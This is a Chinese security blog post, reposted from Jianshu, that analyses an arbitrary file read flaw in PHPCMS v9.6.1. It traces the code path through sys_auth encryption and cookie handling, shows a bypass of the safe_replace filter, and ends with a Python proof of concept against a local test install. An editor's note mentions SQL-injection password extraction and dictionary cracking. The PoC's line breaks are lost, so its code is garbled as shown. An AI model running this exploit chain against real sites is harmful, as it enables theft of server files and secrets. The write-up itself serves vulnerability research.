PHPCMS v9.6.1任意文件读取漏洞

  • A+
所属分类:WEB安全

FROM:https://www.jianshu.com/p/0789ddc4fc55

安云网注(问题待查):

1、本地测试按照这个脚本POC测试,下载时报错,一步步按照流程操作也是报错,环境win7;暂不清楚什么原因,

2、phpcmsV9注入结果正常,但在注入中,

(1)获取username,password时,有错位情况,不清楚原因,反复验证还是如此;

(2)且在实际环境中构造SQL语句是,count like 等一些关键字无法使用;

(3)注入出来的password字段部分不全,有的30位,有的18位;

(4)针对以上情况,目前按照phpcmsV9 密码存贮规则,本地生成字典碰撞....

0x01 漏洞分析

首先本次漏洞的问题函数不在于某一处函数或者语句,而是在与多方面的因素共同作用,最终可以进行绕过从而进行任意文件读取。
在phpcms中,有一个file_down函数用来下载文件的,该函数位于/phpcms/libs/functions/global.func.php

PHPCMS v9.6.1任意文件读取漏洞

该函数就是一个正常的文件下载的函数,而调用这个函数的地方位于phpcms\modules\content\down.php

PHPCMS v9.6.1任意文件读取漏洞

PHPCMS v9.6.1任意文件读取漏洞

PHPCMS v9.6.1任意文件读取漏洞

这里我们从下往上分析,首先调用file_down函数的fileurl参数中的<>被替换成空,往上看发现fileurl是当变量m存在时,变量s与之前的fileurl进行拼接而来的,再往上看发现之前的fileurl是变量f,因此我们要下载的文件参数是通过变量s和变量f拼接而来的!继续向上看,发现有一个parse_str($a_k),因此变量s和变量f是通过parse_str解析a_k变量来的,而a_k变量是通过get方式接收的,因此可控!所以就有风险了。

不过我们能够发现,变量a_k在传进来之后,被传入到了一个sys_auth函数重新赋值了,这个函数是phpcms中一个用来加解密的函数,位于/phpcms/libs/functions/global.func.php

PHPCMS v9.6.1任意文件读取漏洞

这里通过pc_auth_key变量的密钥进行解密。

到目前为止我们需要的是一个使用pc_auth_key密钥,通过sys_auth函数加密过的a_k变量,并且其中的s和f变量是我们可控的,从而才能通过解析出来后拼接,然后带入到file_down函数下载任意文件。

幸运的是,就在down.php中的init函数可以满足这个条件

PHPCMS v9.6.1任意文件读取漏洞

PHPCMS v9.6.1任意文件读取漏洞

PHPCMS v9.6.1任意文件读取漏洞

PHPCMS v9.6.1任意文件读取漏洞

可以看到在init函数的后边,就有一个将a_k变量同pc_auth_key进行加密,并且之后传入了download函数

$pc_auth_key = md5(pc_base::load_config('system','auth_key').$_SERVER['HTTP_USER_AGENT'].'down');

            $a_k = urlencode(sys_auth("i=$i&d=$d&s=$s&t=".SYS_TIME."&ip=".ip()."&m=".$m."&f=$f&modelid=".$modelid, 'ENCODE', $pc_auth_key));

            $downurl = '?m=content&c=down&a=download&a_k='.$a_k;


然后我们来从头看一下init函数。
首先通过get方式接受参数a_k,然后将这个a_k变量进行解密,然后通过safe_replace函数进行过滤,然后通过parse_str进行解析,从而得到了s变量和f变量。
所以这一阶段我们就需要一个加密过的a_k然后传给init函数。
这里用到了之前phpcms的一个sql注入的利用方式,在位于/phpcms/modules/attachment/attachments.php 的swfupload_json()函数,代码如下:

PHPCMS v9.6.1任意文件读取漏洞

这里主要看一下src参数,这里src参数通过get方式接收之后用trim函数去除首尾的空白符,然后通过过safe_replace函数进行过滤,之后通过arr数组进行json编码,后面出入到了set_cookie函数中,而这个函数位于/phpcms/libs/classes/param.class.php,代码如下:

PHPCMS v9.6.1任意文件读取漏洞

可以看到进入后会通过for循环遍历数组,然后src的值会被sys_auth加密!
现在我们可以回过头看一下之前一直被提到的safe_replace函数的作用吧,代码位于/phpcms/libs/functions/global.func.php,代码如下:

PHPCMS v9.6.1任意文件读取漏洞

发现是将敏感符号替换为空,这个绕过就很好绕过了,比如当我们想输入单引号的时候%27,我们只要在其中加入一个位于黑名单的符号就可以了,比如%2;7,分号会被检测到然后替换成空,剩下了%27即为单引号了。

既然刚才在swfupload_json函数中找到了我们想要的结果,那么我们就看一下attachments类的构造函数,看看调用这个swfuplaod_json函数需要什么条件吧

PHPCMS v9.6.1任意文件读取漏洞

函数最下面如果userid为空,会调用showmessage函数,那样程序会被中断的,因此就必须要userid有数据,那么往上看

$this->userid = $_SESSION['userid'] ? $_SESSION['userid'] : (param::get_cookie('_userid') ? param::get_cookie('_userid') : sys_auth($_POST['userid_flash'],'DECODE'));

上述语句是关键
以seesion方式接收userid参数,当$_SESSION['userid']有数据时,返回$_SESSION['userid'],当为空时,进行判断:
静态调用param类的get_cookie函数,并给该函数传递_userid字符串,如果返回不为空执行param::get_cookie('_userid'),如果为空就执行sys_auth($_POST['userid_flash'],'DECODE'))
sys_auth函数在这里进行解密操作,将用post方式接收到的userid_flash参数值,放进sys_auth函数进行解密
session实在服务器端生成的,在不能登录的情况下,session中的userid是空的,因此就会执行get_cookie函数,该函数代码如下

PHPCMS v9.6.1任意文件读取漏洞

其中有sys_auth的解密操作,而如果get_cookie没结果也得DECODE,所以说这里decode是一个必须的操作,不过好消息是decode的目标是我们可以控制的,要么是cookie中的cookie_pre_userid,要么是post过去的userid_flash参数
这里以cookie为例,如果我们需要一个通过set_cookie的加密过的cookie,让它传送到这里,然后就可以通过get_cookie进行解密,从而绕过这里的限制

这里用wap模块的一个地方,代码位于/phpcms/modules/wap/index.php

PHPCMS v9.6.1任意文件读取漏洞

通过第9行调用set_cookie函数,就可以生成一个加密好的cookie了。

0x02 总线

这次漏洞分析大概就是以寻找加密解密来进行分析的,总结了一下流程,如下

PHPCMS v9.6.1任意文件读取漏洞

至此分析结束,下面设计一下poc

0x03 POC

import requests

url_1 = "http://127.0.0.1:8080/code_audit/phpcmsv9.6.1/install_package/index.php?m=wap&c=index&a=init&siteid=1"r_g = requests.get(url_1)for cookie in r_g.cookies:    if '_siteid' in cookie.name:
        userid = cookie.value        print "siteid: " + userid + "\n"url_2 = "http://127.0.0.1:8080/code_audit/phpcmsv9.6.1/install_package/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=pad%3Dx%26i%3D1%26modelid%3D1%26catid%3D1%26d%3D1%26m%3D1%26s%3Dindex%26f%3D.p%25253chp"# ?m=attachment&c=attachments&a=swfupload_json&aid=1&src=pad=x&i=1&modelid=1&catid=1&d=1&m=1&s=index&f=.p%253chpdata_1 = {'userid_flash': userid}
r_p = requests.post(url = url_2, data= data_1)for cookie in r_p.cookies:    if '_att_json' in cookie.name:
        att_json = cookie.value        print "att_json: " + att_json + "\n"key = "http://127.0.0.1:8080/code_audit/phpcmsv9.6.1/install_package/index.php?m=content&c=down&a=init&a_k=" + att_jsonprint key

0x04 演示

运行脚本

PHPCMS v9.6.1任意文件读取漏洞

PHPCMS v9.6.1任意文件读取漏洞












  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: